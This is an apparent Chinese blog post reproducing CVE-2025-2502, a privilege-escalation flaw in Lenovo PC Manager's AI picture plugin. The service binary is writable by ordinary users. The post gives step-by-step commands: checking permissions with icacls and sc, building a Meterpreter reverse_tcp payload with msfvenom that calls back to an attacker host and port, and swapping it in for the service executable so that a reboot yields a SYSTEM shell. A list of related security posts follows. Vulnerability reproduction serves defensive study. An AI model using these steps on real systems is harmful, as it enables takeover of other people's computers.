CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞

在联想电脑管家的任意版本中,联想电脑管家的工具都存在权限缺陷,只要是下载的工具,普通用户拥有 F 权限(完全权限)

由于所有版本的工具都存在权限问题,普通用户可以进如 admin 权限,这边使用 ai 看图插件演示,因为其有 system 权限服务,可以提升至 system,在 5.1.100.1102 之前,联想电脑管家存在插件 AI 看图

在安装 AI 看图插件后,其存在一个可持续服务

plain 复制代码
C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

使用 icacls 查看其文件权限

发现普通 Users 权限为 I F,完全权限,创建一个普通用户

切入攻击视角,在 Administors 用户组未登入的情况下,需要注销所有用户,我们再进入 user1 用户,使用 sc 查看服务,其用户为 LocalSystem

plain 复制代码
sc qc KPICService_Lenovo

其中 C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe 就是普通用户拥有完全控制的文件

但是因为限制,该服务会一直占用,普通用户需要 admin 才能进行关闭

尝试更换思路:因为普通用户有完全控制权限,普通用户将文件进行移动,重启时,服务读取配置路径,还是会以 LocalSystem 运行 kpicservice.exe

现在开始实践,先生成一个 kpicservice.exe

plain 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -f exe -o kpicservice.exe

同时将原文件路径进行移动 ,并将 shell 替换原文件的 kpicservice.exe

plain 复制代码
move C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe kpicservice.exe
move Desktop\kpicservice.exe C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

此时再重启设备,服务会启动路径中即被替换的 kpicservice ,获得 system 权限

相关推荐
菩提小狗2 天前
每日安全情报报告 · 2026-08-20
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗4 天前
每日安全情报报告 · 2026-08-18
网络安全·漏洞·cve·安全情报·每日安全
小新讲网安4 天前
WiFi安全攻防实战:WPA3新协议与传统破解技术全解析
开发语言·网络·安全·php·漏洞·nmap·漏洞检测
菩提小狗5 天前
每日安全情报报告 · 2026-08-17
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗7 天前
每日安全情报报告 · 2026-08-15
网络安全·漏洞·cve·安全情报·每日安全
小新讲网安8 天前
HTTP请求走私攻击实战:CL.TE与TE.CL绕过前端服务器全解析
服务器·前端·网络·web安全·http·架构·漏洞
菩提小狗9 天前
每日安全情报报告 · 2026-08-12
网络安全·漏洞·cve·安全情报·每日安全
小新讲网安9 天前
漏洞复现实战大全:CVE漏洞环境搭建与利用全流程详解
安全·黑客·漏洞·nmap·漏洞复现·漏洞检测·虚拟机靶场
Yan_chen66610 天前
CTFHub XSS反射型实战攻略
前端·网络安全·漏洞·xss·ctfhub web前置技能
菩提小狗12 天前
每日安全情报报告 · 2026-08-10
网络安全·漏洞·cve·安全情报·每日安全